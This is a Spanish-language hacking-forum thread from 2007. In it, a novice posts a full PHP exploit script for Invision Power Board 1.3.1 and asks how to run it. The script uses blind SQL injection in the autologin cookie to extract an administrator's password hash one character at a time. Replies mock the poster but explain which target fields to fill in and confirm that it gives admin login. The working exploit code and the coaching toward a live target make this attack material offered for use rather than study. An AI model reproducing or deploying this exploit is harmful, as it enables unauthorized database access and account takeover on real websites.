elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
07 Octubre 2008, 07:05  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, zhyzura)
| | |-+  Ayuda con el exploit .php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Ayuda con el exploit .php  (Leído 472 veces)
alexis11

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Ayuda con el exploit .php
« en: 01 Enero 2007, 21:40 »

Hola, estoy intentando ejecutar este exploit, es para Invision Power Board v1.3.1¿Este exploit es para logearse como admin?

Pero el problema despues de compilarlo, ejecuto el exploit y me sale esto:

Código:
Warning: fsockopen(): php_network_getaddresses: gethostbyname failed in C:\My Mu
sic\Bamcompile\exploit3.php on line 57

Warning: fsockopen(): unable to connect to SERVER:80 in C:\My Music\Bamcompile\e
xploit3.php on line 57
1: 0

Código:
<?php
/*
<= 1.3.1 Final
/str0ke
*/

$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
        $idx = 0;
        $found = false;

        while( !($found) ) {
                $letter = substr($hex, $idx, 1);

                /* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
                $cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
                $cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;

                /* Query is in effect: SELECT * FROM ibf_members
                                       WHERE id=$id AND password='$pass' OR
id=$target
                                       HAVING id=$target AND
MID(`password`,$i,1)='$letter' */

                $header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
                if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
                        echo $i . ": " . $letter . "\n";
                        $found = true;

                        $hash .= $letter;
                } else {
                        $idx++;
                }
        }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
        $ip = gethostbyname($server);
        $fp = fsockopen($ip, $port);

        if (!$fp) {
                return "Unknown";
        } else {
                $com = "HEAD $file HTTP/1.1\r\n";
                $com .= "Host: $server:$port\r\n";
                $com .= "Cookie: $cookie\r\n";
                $com .= "Connection: close\r\n";
                $com .= "\r\n";

                fputs($fp, $com);

                do {
                        $header.= fread($fp, 512);
                } while( !preg_match('/\r\n\r\n$/',$header) );
        }

        return $header;
}
?>

// milw0rm.com [2005-06-08]
« Última modificación: 01 Enero 2007, 21:42 por alexis11 » En línea
alone-in-the-chat

Conectado Conectado

Mensajes: 528


Ver Perfil
Re: Ayuda con el exploit .php
« Respuesta #1 en: 01 Enero 2007, 21:53 »

xDºº no debes de ejecutar nada x que si :) primero revisa la logica del programa
no kreo que el servidor al que te deseas conectar se llame "SERVER"  :)


Código:
$server = "SERVER";
$port = 80;
$file = "PATH";
debes de editar esas lineas ;) con los datos de tu servidor te recomiendo que aprendas a programar en php
no se trata de ejecutar algo x que si =)
Saludos´
 
En línea

Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b
alexis11

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Ayuda con el exploit .php
« Respuesta #2 en: 01 Enero 2007, 21:55 »

como consigo esos datos??

El server seria la url de la web ¿¿NO??

Port no se

file no se
En línea
alone-in-the-chat

Conectado Conectado

Mensajes: 528


Ver Perfil
Re: Ayuda con el exploit .php
« Respuesta #3 en: 01 Enero 2007, 21:57 »

:) 5mentarios ....

En línea

Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b
alexis11

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Ayuda con el exploit .php
« Respuesta #4 en: 01 Enero 2007, 23:24 »

¿pon me un ejemplo de como estaria configurado?

¿Cual es el user y la pass?

el path, server y port que pongo hay??
En línea
RevangelyonX

Desconectado Desconectado

Mensajes: 117


Ver Perfil
Re: Ayuda con el exploit .php
« Respuesta #5 en: 02 Enero 2007, 01:06 »

Porfavor, que lammer...
La gente como tú, son la causa de que el Hacker, se defina como lo define la sociedad.... Y no me estoy llamando hacker.

Bueno para empezar, deberias leerte 4 cosas, mejor dicho un buen manual de PHP y poder comprender ese código. y también algo de SQL ya que hay algunos trozos del script con SQL.

Con este exploit, si, puedes loguearte como Administrador.

En server deberás poner www.webvulnerable.com

El UId dice que no es importante poner uno en concreto, te pone el 10... pero puedes poner el 1. Y el password lo deja en blanco.
Realmente es bonito este exploit...

Citar
¿pon me un ejemplo de como estaria configurado?

¿Cual es el user y la pass?

el path, server y port que pongo hay??
ejem...

http://www.google.com/search?hl=es&q=define%3Alammer&btnG=B%C3%BAsqueda+en+Google&lr=

Te hacemos todo el trabajo...
En línea
Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats